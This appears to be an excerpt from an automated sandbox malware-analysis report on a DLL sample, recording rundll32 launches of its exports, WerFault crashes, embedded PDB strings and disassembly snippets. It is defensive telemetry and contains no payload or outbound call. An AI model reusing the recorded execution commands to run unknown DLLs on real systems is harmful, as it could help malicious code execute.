Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Dealthis
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Sing
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,Teethshould
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 652
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 644
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 652
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 660
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1Jump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,BusysectionJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,DealthisJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,SingJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\lj3H69Z3Io.dll,TeethshouldJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: lj3H69Z3Io.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: lj3H69Z3Io.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: shlwapi.pdb9} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbdj source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: profapi.pdbXPJ"i source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wtsapi32.pdbyN[ source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.533609109.0000000003110000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbrP " source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: mpr.pdb$ source: WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbMNG source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.572578317.0000000002B70000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb[Ny source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbBPp" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb( source: WerFault.exe, 00000015.00000003.571572737.00000000048BE000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb~PT"a source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbDP~". source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Bed.pdb' source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdbEOSz source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdbVPL"r source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: Bed.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdbsG7" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: propsys.pdbsNA source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb}IU source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000F.00000003.533933827.0000000002EAF000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.534503789.000000000310A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.572578317.0000000002B70000.00000004.00000001.sdmp
Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: mpr.pdbAw source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbGNM source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbz source: WerFault.exe, 00000015.00000003.572645587.0000000002BAD000.00000004.00000001.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: combase.pdb5} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb#}#Ui source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdb source: rundll32.exe, 00000003.00000002.613268258.000000006E221000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.528135679.000000006E221000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.563830919.000000006E221000.00000002.00020000.sdmp, WerFault.exe, 0000000F.00000003.533122427.0000000002EEB000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.571572737.00000000048BE000.00000004.00000001.sdmp, lj3H69Z3Io.dll
Source: Binary string: c:\201\Their\Quart-Sheet\497_who\Bed.pdbf source: WerFault.exe, 0000000F.00000003.533122427.0000000002EEB000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Bed.pdbBv source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb( source: WerFault.exe, 00000011.00000003.533142014.0000000003105000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb0Pb" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: winspool.pdbUN source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbNPd" source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdblPF"e source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: netapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdb?} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbtP." source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.533631070.0000000003116000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.540531872.0000000005280000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540693865.00000000053A0000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580360213.00000000029F0000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: combase.pdbjPX"r source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.533609109.0000000003110000.00000004.00000001.sdmp
Source: Binary string: wtsapi32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbK} source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: netutils.pdb>j$U source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: sechost.pdbANs source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wimm32.pdb-}%Ur source: WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000F.00000003.540485682.00000000052A0000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.540661317.00000000053D1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.580318352.0000000004DE2000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb`PR"C source: WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: Nc:\201\Their\Quart-Sheet\497_who\Bed.pdb source: WerFault.exe, 0000000F.00000003.532839639.0000000004CCE000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.570661557.00000000048DD000.00000004.00000001.sdmp
Source: Binary string: netutils.pdb source: WerFault.exe, 0000000F.00000003.540545637.0000000005286000.00000004.00000040.sdmp, WerFault.exe, 00000011.00000003.540718157.00000000053A6000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.580373487.00000000029F6000.00000004.00000040.sdmp
Source: Binary string: a'pjr*pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.548507625.0000000002E32000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D1F7C LoadLibraryA,GetProcAddress,3_2_6E1D1F7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03097DCF push ecx; ret 2_2_03097DDF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03097A60 push ecx; ret 2_2_03097A69
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2200 push ecx; ret 3_2_6E1D2209
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D2253 push ecx; ret 3_2_6E1D2263
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20446D push ecx; ret 3_2_6E204480
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E204AC6 push ecx; ret 3_2_6E204AD9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24F506 push ds; ret 3_2_6E24F508
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20446D push ecx; ret 4_2_6E204480
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D2D07 push ebp; ret 4_2_6E1D2D17
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E204AC6 push ecx; ret 4_2_6E204AD9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D6129 push eax; ret 4_2_6E1D6186
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D49D3 push ecx; iretd 4_2_6E1D49D8
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
